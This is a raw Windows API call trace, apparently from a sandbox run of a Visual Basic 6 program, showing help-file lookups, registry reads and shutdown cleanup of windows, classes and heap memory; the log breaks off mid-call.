[0165.602] SendMessageA (hWnd=0x103de, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0165.602] GetCurrentThreadId () returned 0xba4 [0165.602] GetCurrentThreadId () returned 0xba4 [0165.602] GetCurrentThreadId () returned 0xba4 [0165.602] GetCurrentThreadId () returned 0xba4 [0165.603] GetCurrentThreadId () returned 0xba4 [0165.603] GetCurrentThreadId () returned 0xba4 [0165.603] GetCurrentThreadId () returned 0xba4 [0165.603] lstrcpyA (in: lpString1=0x28f990, lpString2="" | out: lpString1="") returned="" [0165.604] lstrlenA (lpString="") returned 0 [0165.604] lstrcpyA (in: lpString1=0x28f788, lpString2="" | out: lpString1="") returned="" [0165.604] lstrcpynA (in: lpString1=0x28f360, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0165.604] lstrlenA (lpString="") returned 0 [0165.604] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1) returned 0x2c8a928 [0165.604] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x1) returned 0x2c8a938 [0165.604] lstrcpyA (in: lpString1=0x2c8a928, lpString2="" | out: lpString1="") returned="" [0165.604] lstrlenA (lpString="") returned 0 [0165.604] lstrlenA (lpString=".HLP") returned 4 [0165.604] lstrcpyA (in: lpString1=0x28f47c, lpString2="" | out: lpString1="") returned="" [0165.604] lstrcatA (in: lpString1="", lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0165.604] lstrcpynA (in: lpString1=0x28f240, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0165.604] lstrlenA (lpString=".HLP") returned 4 [0165.604] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a928, Size=0x5) returned 0x2c8a928 [0165.605] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a938, Size=0x5) returned 0x2c8a938 [0165.605] lstrcpyA (in: lpString1=0x2c8a928, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0165.605] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x105) returned 0x2c8a948 [0165.605] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x5) returned 0x2c8aa58 [0165.606] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f330 | out: phkResult=0x28f330*=0x170) returned 0x0 [0165.606] RegOpenKeyExA (in: hKey=0x170, lpSubKey="HTML Help", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f334 | out: phkResult=0x28f334*=0x16c) returned 0x0 [0165.606] RegQueryValueExA (in: hKey=0x16c, lpValueName=".HLP", lpReserved=0x0, lpType=0x0, lpData=0x2c8a948, lpcbData=0x28f32c*=0x104 | out: lpType=0x0, lpData=0x2c8a948*=0xd0, lpcbData=0x28f32c*=0x104) returned 0x2 [0165.606] RegCloseKey (hKey=0x16c) returned 0x0 [0165.607] RegCloseKey (hKey=0x170) returned 0x0 [0165.607] GetPrivateProfileStringA (in: lpAppName="FILES", lpKeyName=".HLP", lpDefault="", lpReturnedString=0x2c8a948, nSize=0x104, lpFileName="WINHELP.INI" | out: lpReturnedString="") returned 0x0 [0165.608] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8a948 | out: hHeap=0x2c70000) returned 1 [0165.608] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8aa58 | out: hHeap=0x2c70000) returned 1 [0165.608] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x105) returned 0x2c8a948 [0165.608] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x5) returned 0x2c8aa58 [0165.608] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f330 | out: phkResult=0x28f330*=0x170) returned 0x0 [0165.608] RegOpenKeyExA (in: hKey=0x170, lpSubKey="Help", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f334 | out: phkResult=0x28f334*=0x0) returned 0x2 [0165.608] RegCloseKey (hKey=0x170) returned 0x0 [0165.609] GetPrivateProfileStringA (in: lpAppName="FILES", lpKeyName=".HLP", lpDefault="", lpReturnedString=0x2c8a948, nSize=0x104, lpFileName="WINHELP.INI" | out: lpReturnedString="") returned 0x0 [0165.609] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8a948 | out: hHeap=0x2c70000) returned 1 [0165.609] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8aa58 | out: hHeap=0x2c70000) returned 1 [0165.616] lstrcpynA (in: lpString1=0x28f234, lpString2="C:\\Windows\\system32", iMaxLength=260 | out: lpString1="C:\\Windows\\system32") returned="C:\\Windows\\system32" [0165.616] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0165.616] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a928, Size=0x14) returned 0x2c8a948 [0165.616] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0165.616] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a938, Size=0x14) returned 0x2c8a968 [0165.616] lstrcpyA (in: lpString1=0x2c8a948, lpString2="C:\\Windows\\system32" | out: lpString1="C:\\Windows\\system32") returned="C:\\Windows\\system32" [0165.616] lstrcpynA (in: lpString1=0x28f23c, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0165.617] lstrlenA (lpString=".HLP") returned 4 [0165.617] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0165.617] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a948, Size=0x19) returned 0x2c8a988 [0165.618] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0165.618] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a968, Size=0x19) returned 0x2c8a928 [0165.618] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0165.618] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2=".HLP" | out: lpString1="C:\\Windows\\system32\\.HLP") returned="C:\\Windows\\system32\\.HLP" [0165.618] lstrlenA (lpString="C:\\Windows\\system32\\.HLP") returned 24 [0165.618] CharToOemBuffA (in: lpszSrc="C:\\Windows\\system32\\.HLP", lpszDst=0x28f240, cchDstLength=0x19 | out: lpszDst="C:\\Windows\\system32\\.HLP") returned 1 [0165.618] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\.HLP" (normalized: "c:\\windows\\syswow64\\.hlp")) returned 0xffffffff [0165.618] GetLastError () returned 0x2 [0165.618] GetLastError () returned 0x2 [0165.618] SetLastError (dwErrCode=0x2) [0165.619] GetLastError () returned 0x2 [0165.619] SetLastError (dwErrCode=0x2) [0165.619] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\.HLP" (normalized: "c:\\windows\\syswow64\\.hlp")) returned 0xffffffff [0165.619] GetLastError () returned 0x2 [0165.619] GetLastError () returned 0x2 [0165.619] SetLastError (dwErrCode=0x2) [0165.619] GetLastError () returned 0x2 [0165.619] SetLastError (dwErrCode=0x2) [0165.619] GetWindowsDirectoryA (in: lpBuffer=0x28f35c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0165.619] lstrlenA (lpString="C:\\Windows") returned 10 [0165.619] lstrlenA (lpString="C:\\Windows") returned 10 [0165.620] lstrlenA (lpString="C:\\Windows\\") returned 11 [0165.620] lstrcpynA (in: lpString1=0x28f240, lpString2="C:\\Windows\\Help", iMaxLength=260 | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0165.620] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0165.620] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a988, Size=0x10) returned 0x2c8a988 [0165.620] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0165.620] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a928, Size=0x10) returned 0x2c8a928 [0165.620] lstrcpyA (in: lpString1=0x2c8a988, lpString2="C:\\Windows\\Help" | out: lpString1="C:\\Windows\\Help") returned="C:\\Windows\\Help" [0165.620] lstrcpynA (in: lpString1=0x28f23c, lpString2=".HLP", iMaxLength=260 | out: lpString1=".HLP") returned=".HLP" [0165.621] lstrlenA (lpString=".HLP") returned 4 [0165.621] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0165.621] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a988, Size=0x15) returned 0x2c8a988 [0165.621] lstrlenA (lpString="C:\\Windows\\Help") returned 15 [0165.621] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a928, Size=0x15) returned 0x2c8a928 [0165.621] lstrcatA (in: lpString1="C:\\Windows\\Help", lpString2="\\" | out: lpString1="C:\\Windows\\Help\\") returned="C:\\Windows\\Help\\" [0165.621] lstrcatA (in: lpString1="C:\\Windows\\Help\\", lpString2=".HLP" | out: lpString1="C:\\Windows\\Help\\.HLP") returned="C:\\Windows\\Help\\.HLP" [0165.622] lstrlenA (lpString="C:\\Windows\\Help\\.HLP") returned 20 [0165.622] CharToOemBuffA (in: lpszSrc="C:\\Windows\\Help\\.HLP", lpszDst=0x28f240, cchDstLength=0x15 | out: lpszDst="C:\\Windows\\Help\\.HLP") returned 1 [0165.622] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0165.622] GetLastError () returned 0x2 [0165.622] GetLastError () returned 0x2 [0165.622] SetLastError (dwErrCode=0x2) [0165.622] GetLastError () returned 0x2 [0165.622] SetLastError (dwErrCode=0x2) [0165.622] GetFileAttributesA (lpFileName="C:\\Windows\\Help\\.HLP" (normalized: "c:\\windows\\help\\.hlp")) returned 0xffffffff [0165.623] GetLastError () returned 0x2 [0165.623] GetLastError () returned 0x2 [0165.623] SetLastError (dwErrCode=0x2) [0165.623] GetLastError () returned 0x2 [0165.623] SetLastError (dwErrCode=0x2) [0165.623] lstrlenA (lpString="") returned 0 [0165.623] lstrcpyA (in: lpString1=0x28f250, lpString2="" | out: lpString1="") returned="" [0165.623] lstrlenA (lpString=".HLP") returned 4 [0165.623] lstrlenA (lpString="") returned 0 [0165.623] lstrcpynA (in: lpString1=0x28f360, lpString2="", iMaxLength=260 | out: lpString1="") returned="" [0165.623] lstrlenA (lpString="") returned 0 [0165.623] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a988, Size=0x1) returned 0x2c8a988 [0165.624] RtlReAllocateHeap (Heap=0x2c70000, Flags=0x0, Ptr=0x2c8a928, Size=0x1) returned 0x2c8a928 [0165.624] lstrcpyA (in: lpString1=0x2c8a988, lpString2="" | out: lpString1="") returned="" [0165.624] lstrcpyA (in: lpString1=0x28f990, lpString2="" | out: lpString1="") returned="" [0165.624] lstrlenA (lpString="") returned 0 [0165.624] lstrlenA (lpString="") returned 0 [0165.624] lstrcatA (in: lpString1="", lpString2="" | out: lpString1="") returned="" [0165.624] GetDesktopWindow () returned 0x10010 [0165.624] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8a928 | out: hHeap=0x2c70000) returned 1 [0165.624] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8a988 | out: hHeap=0x2c70000) returned 1 [0165.624] CoFreeUnusedLibraries () [0165.648] GetCurrentThreadId () returned 0xba4 [0165.648] DestroyWindow (hWnd=0x103de) returned 1 [0165.648] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0165.648] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x46, wParam=0x0, lParam=0x28fc20) returned 0x0 [0165.878] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x47, wParam=0x0, lParam=0x28fc20) returned 0x0 [0165.932] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.933] NtdllDefWindowProc_A (hWnd=0x103e4, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0165.933] NtdllDefWindowProc_A (hWnd=0x103e4, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.934] PostQuitMessage (nExitCode=0) [0165.934] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0165.935] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x1050, wParam=0x0, lParam=0x0) returned 0x0 [0165.935] GetCurrentThreadId () returned 0xba4 [0165.935] GetCurrentThreadId () returned 0xba4 [0165.936] GetCurrentThreadId () returned 0xba4 [0165.936] GetCurrentThreadId () returned 0xba4 [0165.937] GetCurrentThreadId () returned 0xba4 [0165.941] GetCurrentThreadId () returned 0xba4 [0165.941] GetCurrentThreadId () returned 0xba4 [0165.941] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0165.944] GetCurrentThreadId () returned 0xba4 [0165.944] GetCurrentThreadId () returned 0xba4 [0165.944] GetCurrentThreadId () returned 0xba4 [0165.944] GetCurrentThreadId () returned 0xba4 [0165.944] GetCurrentThreadId () returned 0xba4 [0165.945] GetCurrentThreadId () returned 0xba4 [0165.945] GetCurrentThreadId () returned 0xba4 [0165.945] GetCurrentThreadId () returned 0xba4 [0165.945] GetCurrentThreadId () returned 0xba4 [0165.945] GetCurrentThreadId () returned 0xba4 [0165.945] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82ad8 | out: hHeap=0x2c70000) returned 1 [0165.946] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bcc0 | out: hHeap=0x2c70000) returned 1 [0165.946] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82af8 | out: hHeap=0x2c70000) returned 1 [0165.946] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82b18 | out: hHeap=0x2c70000) returned 1 [0165.946] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8bbb8 | out: hHeap=0x2c70000) returned 1 [0165.946] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c88530 | out: hHeap=0x2c70000) returned 1 [0165.946] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87c40 | out: hHeap=0x2c70000) returned 1 [0165.946] GetCurrentThreadId () returned 0xba4 [0165.946] GetCurrentThreadId () returned 0xba4 [0165.947] GetCurrentThreadId () returned 0xba4 [0165.948] GetCurrentThreadId () returned 0xba4 [0165.948] GetCurrentThreadId () returned 0xba4 [0165.948] GetCurrentThreadId () returned 0xba4 [0165.948] PostMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 1 [0165.951] GetCurrentThreadId () returned 0xba4 [0165.952] GetCurrentThreadId () returned 0xba4 [0165.952] GetCurrentThreadId () returned 0xba4 [0165.959] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87be0 | out: hHeap=0x2c70000) returned 1 [0165.959] IMalloc:Free (This=0x76da66bc, pv=0x10992e8) [0165.959] IMalloc:Free (This=0x76da66bc, pv=0x10992c0) [0165.959] IMalloc:Free (This=0x76da66bc, pv=0x10a44c0) [0165.959] IMalloc:Free (This=0x76da66bc, pv=0x10a5e90) [0165.960] IMalloc:Free (This=0x76da66bc, pv=0x1098d88) [0165.960] IMalloc:Free (This=0x76da66bc, pv=0x108ebd0) [0165.960] IMalloc:Free (This=0x76da66bc, pv=0x1098d18) [0165.960] IMalloc:Free (This=0x76da66bc, pv=0x108ef50) [0165.960] IMalloc:Free (This=0x76da66bc, pv=0x108e758) [0165.960] IMalloc:Free (This=0x76da66bc, pv=0x108f060) [0165.960] IMalloc:Free (This=0x76da66bc, pv=0x108c610) [0165.960] GetCurrentThreadId () returned 0xba4 [0165.961] GetCurrentThreadId () returned 0xba4 [0165.961] GetCurrentThreadId () returned 0xba4 [0165.961] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81570 | out: hHeap=0x2c70000) returned 1 [0165.961] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81540 | out: hHeap=0x2c70000) returned 1 [0165.961] GetCurrentThreadId () returned 0xba4 [0165.961] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81cc0 | out: hHeap=0x2c70000) returned 1 [0165.961] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8abb8 | out: hHeap=0x2c70000) returned 1 [0165.961] GetCurrentThreadId () returned 0xba4 [0165.961] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74780 | out: hHeap=0x2c70000) returned 1 [0165.962] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81468 | out: hHeap=0x2c70000) returned 1 [0165.962] GetCurrentThreadId () returned 0xba4 [0165.962] GetCurrentThreadId () returned 0xba4 [0165.962] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72270 | out: hHeap=0x2c70000) returned 1 [0165.962] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72208 | out: hHeap=0x2c70000) returned 1 [0165.962] GetCurrentThreadId () returned 0xba4 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c828f8 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82a98 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82a58 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82a18 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82918 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82998 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c82958 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c829d8 | out: hHeap=0x2c70000) returned 1 [0165.963] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c828d8 | out: hHeap=0x2c70000) returned 1 [0165.963] SetEvent (hEvent=0x138) returned 1 [0165.963] CloseHandle (hObject=0x138) returned 1 [0165.964] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c8ad00 | out: hHeap=0x2c70000) returned 1 [0165.964] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c813c0 | out: hHeap=0x2c70000) returned 1 [0165.964] HeapFree (in: hHeap=0x3fc0000, dwFlags=0x0, lpMem=0x3fc08f0 | out: hHeap=0x3fc0000) returned 1 [0165.964] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c81498 | out: hHeap=0x2c70000) returned 1 [0165.964] HeapFree (in: hHeap=0x3fc0000, dwFlags=0x0, lpMem=0x3fc0928 | out: hHeap=0x3fc0000) returned 1 [0165.964] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72cc0 | out: hHeap=0x2c70000) returned 1 [0165.964] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72e38 | out: hHeap=0x2c70000) returned 1 [0165.964] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72ea8 | out: hHeap=0x2c70000) returned 1 [0165.965] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72ca8 | out: hHeap=0x2c70000) returned 1 [0165.965] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c72b88 | out: hHeap=0x2c70000) returned 1 [0165.965] lstrlenA (lpString="ThunderRT6") returned 10 [0165.965] lstrcpyA (in: lpString1=0x28fcf8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.965] UnregisterClassA (lpClassName="ThunderRT6TextBox", hInstance=0x72940000) returned 1 [0165.965] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73370 | out: hHeap=0x2c70000) returned 1 [0165.965] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73498 | out: hHeap=0x2c70000) returned 1 [0165.965] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73330 | out: hHeap=0x2c70000) returned 1 [0165.965] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73500 | out: hHeap=0x2c70000) returned 1 [0165.965] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x2c70000) returned 1 [0165.966] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c731f8 | out: hHeap=0x2c70000) returned 1 [0165.966] lstrlenA (lpString="ThunderRT6") returned 10 [0165.966] lstrcpyA (in: lpString1=0x28fcf8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.966] UnregisterClassA (lpClassName="ThunderRT6CommandButton", hInstance=0x72940000) returned 1 [0165.966] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c738e8 | out: hHeap=0x2c70000) returned 1 [0165.966] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c739c8 | out: hHeap=0x2c70000) returned 1 [0165.966] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c738b8 | out: hHeap=0x2c70000) returned 1 [0165.966] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73a18 | out: hHeap=0x2c70000) returned 1 [0165.967] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73898 | out: hHeap=0x2c70000) returned 1 [0165.967] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73778 | out: hHeap=0x2c70000) returned 1 [0165.967] lstrlenA (lpString="ThunderRT6") returned 10 [0165.967] lstrcpyA (in: lpString1=0x28fcf8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0165.967] UnregisterClassA (lpClassName="ThunderRT6Timer", hInstance=0x72940000) returned 1 [0165.967] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73d58 | out: hHeap=0x2c70000) returned 1 [0165.967] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73d90 | out: hHeap=0x2c70000) returned 1 [0165.967] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73d40 | out: hHeap=0x2c70000) returned 1 [0165.967] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73da0 | out: hHeap=0x2c70000) returned 1 [0165.967] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73d28 | out: hHeap=0x2c70000) returned 1 [0165.968] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73c08 | out: hHeap=0x2c70000) returned 1 [0165.968] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73fa0 | out: hHeap=0x2c70000) returned 1 [0165.968] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73f88 | out: hHeap=0x2c70000) returned 1 [0165.968] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73e68 | out: hHeap=0x2c70000) returned 1 [0165.968] lstrlenA (lpString="ThunderRT6") returned 10 [0166.020] lstrcpyA (in: lpString1=0x28fcf8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0166.020] UnregisterClassA (lpClassName="ThunderRT6Form", hInstance=0x72940000) returned 1 [0166.098] lstrlenA (lpString="ThunderRT6") returned 10 [0166.098] lstrcpyA (in: lpString1=0x28fcf8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0166.098] lstrlenA (lpString="ThunderRT6Form") returned 14 [0166.098] lstrcpynA (in: lpString1=0x28fd06, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0166.099] UnregisterClassA (lpClassName="ThunderRT6FormDC", hInstance=0x72940000) returned 1 [0166.099] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c741d8 | out: hHeap=0x2c70000) returned 1 [0166.099] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74368 | out: hHeap=0x2c70000) returned 1 [0166.099] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c743f0 | out: hHeap=0x2c70000) returned 1 [0166.099] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c87d50 | out: hHeap=0x2c70000) returned 1 [0166.099] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c741c8 | out: hHeap=0x2c70000) returned 1 [0166.099] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c740a8 | out: hHeap=0x2c70000) returned 1 [0166.100] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c748c0 | out: hHeap=0x2c70000) returned 1 [0166.100] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c748f8 | out: hHeap=0x2c70000) returned 1 [0166.100] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c731c8 | out: hHeap=0x2c70000) returned 1 [0166.100] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c747a0 | out: hHeap=0x2c70000) returned 1 [0166.100] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74ae0 | out: hHeap=0x2c70000) returned 1 [0166.100] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74b08 | out: hHeap=0x2c70000) returned 1 [0166.100] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c731e0 | out: hHeap=0x2c70000) returned 1 [0166.101] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c749c0 | out: hHeap=0x2c70000) returned 1 [0166.101] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74cd0 | out: hHeap=0x2c70000) returned 1 [0166.101] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74e60 | out: hHeap=0x2c70000) returned 1 [0166.101] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74ee8 | out: hHeap=0x2c70000) returned 1 [0166.101] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74cb8 | out: hHeap=0x2c70000) returned 1 [0166.101] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74b98 | out: hHeap=0x2c70000) returned 1 [0166.101] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75328 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c753b8 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c73198 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75208 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75660 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75850 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75908 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75648 | out: hHeap=0x2c70000) returned 1 [0166.102] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75528 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75ed8 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c76070 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c76100 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c74710 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c75db8 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c76538 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, dwFlags=0x0, lpMem=0x2c76708 | out: hHeap=0x2c70000) returned 1 [0166.103] HeapFree (in: hHeap=0x2c70000, 